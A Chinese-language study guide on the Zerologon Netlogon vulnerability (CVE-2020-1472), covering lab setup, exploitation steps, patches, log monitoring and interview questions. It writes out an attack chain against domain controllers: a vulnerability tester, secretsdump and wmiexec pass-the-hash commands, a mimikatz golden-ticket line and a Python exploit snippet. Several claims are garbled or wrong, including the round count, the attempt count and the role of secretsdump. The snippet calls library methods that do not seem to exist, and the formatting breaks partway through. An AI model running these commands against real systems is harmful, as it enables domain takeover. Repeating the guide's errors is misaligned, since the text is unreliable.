Netlogon特权提升漏洞CVE 2020-1472该如何复习

# Netlogon特权提升漏洞CVE-2020-1472该如何复习

## 漏洞背景与重要性

CVE-2020-1472（又称Zerologon）是微软Windows Netlogon远程协议（MS-NRPC）中的一个关键特权提升漏洞，于2020年8月由Secura公司研究员Tom Tervoort首次披露。该漏洞因其CVSS 3.1评分高达10.0分，被列为"严重"级别漏洞，影响所有Windows Server版本（2008R2至2019）。

### 漏洞核心机制
漏洞源于Netlogon协议在认证过程中对AES-CFB8加密算法的错误实现：
1. **初始化向量(IV)固定为零值**：未使用随机IV导致加密可预测
2. **未验证客户端提供的部分参数**：允许攻击者伪造身份凭证
3. **8轮加密代替标准16轮**：大幅降低暴力破解难度（理论成功率1/256）

## 漏洞复现与验证方法

### 实验环境搭建
推荐使用以下配置：
```bash
# 靶机环境
Windows Server 2016 DC (未打补丁)
IP: 192.168.1.100

# 攻击机
Kali Linux 2020+
工具集：Impacket, Zerologon-tester

分步验证过程

1. 漏洞检测

python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDRESS

当输出Success!时确认存在漏洞

1. **利用流程

# 重置机器账户密码
python3 secretsdump.py -no-pass DC_NETBIOS_NAME\$@DC_IP_ADDRESS

# 获取域管理员令牌
python3 wmiexec.py -hashes :NTLM_HASH DOMN/ADMIN@DC_IP

1. **权限维持

# 创建黄金票据
mimikatz # kerberos::golden /domain:DOMN /sid:S-1-5-21-... /rc4:31d6cfe0d16ae931b73c /user:Administrator /ptt

修复方案深度解析

微软分两个阶段发布补丁：

第一阶段（2020年8月）

• 强制启用安全RPC（通过KB4557222）
• 注册表关键项：

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters]
"FullSecureChannelProtection"=dword:00000001

第二阶段（2021年2月）

• 完全移除不安全的加密方式
• 必须确保所有DC升级到以下版本：
  • Windows Server 2008 R2: KB4597402
  • Windows Server 2012 R2: KB4598275
  • Windows Server 2016: KB4598239
  • Windows Server 2019: KB4598243

复习重点与知识图谱

核心知识点脑图

graph TD
A[CVE-2020-1472] --> B[漏洞原理]
A --> C[影响范围]
A --> D[利用方法]
B --> B1[Netlogon协议缺陷]
B1 --> B11[AES-CFB8实现错误]
B1 --> B12[IV未随机化]
D --> D1[密码重置]
D --> D2[票据伪造]

面试常见问题

1. 为什么该漏洞只需要8次尝试即可成功？

   • 由于加密轮次减少，每次尝试有1/256的成功概率

2. 域控制器如何强制实施安全补丁？

   • 通过组策略推送Domain Controller: Allow vulnerable Netlogon secure channel connections设置为”禁用”

3. 如何检测网络中是否存在未修复设备？

   • 使用Nmap脚本：nmap --script zerologon -p 445 <target>

实战演练建议

靶场建设方案

推荐使用以下平台搭建实验环境： 1. TryHackMe：Zerologon Room 2. HackTheBox：Active机器（需VIP） 3. 本地虚拟化： - Windows Server 2016 + VMware ESXi - 配置至少2台DC实现域复制

典型攻击场景

# 自动化利用脚本示例
from impacket.dcerpc.v5 import nrpc

def exploit(target):
    binding = r'ncacn_ip_tcp:%s[445]' % target
    rpc_con = nrpc.DCERPCSession(binding)
    rpc_con.setup_authenticator()
    if rpc_con.attempt_exploit():
        print("[+] 漏洞利用成功")
        return rpc_con.get_hashes()

防御体系构建

纵深防御策略

关键日志监控

<!-- Windows事件ID -->
<QueryList>
  <Query Id="0">
    <Select Path="Security">
      *[EventID=4742]  <!-- 机器账户密码更改 -->
      *[EventID=4672]  <!-- 特权登录 -->
    </Select>
  </Query>
</QueryList>

延伸学习资源

推荐资料

1. 微软官方文档：

   • ADV190023 | Microsoft Guidance

2. 研究论文：

   • 《Zerologon: Exploiting a Cryptographic Vulnerability in Microsoft’s Netlogon Protocol》(Secura, 2020)

3. CTF挑战：

   • HackTheBox: Active Machine (Retired)
   • VulnHub: Stapler

工具集合

- [SecuraBV/Zerologon](https://github.com/SecuraBV/Zerologon)
- [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472)
- [risksense/zerologon](https://github.com/risksense/zerologon)

总结与复习要点

1. 每周自查清单：

   • [ ] 确认所有DC已安装第二阶段补丁
   • [ ] 检查域控事件日志中的4742事件
   • [ ] 测试漏洞利用工具是否仍能生效

2. 知识巩固建议：

   • 每月进行一次域环境渗透测试
   • 参加Red Team/Blue Team对抗演练
   • 跟踪CVE-2020-1472相关IOCs更新

注：本文所有渗透测试方法仅限授权环境使用，未经授权的测试可能违反《网络安全法》相关规定。 “`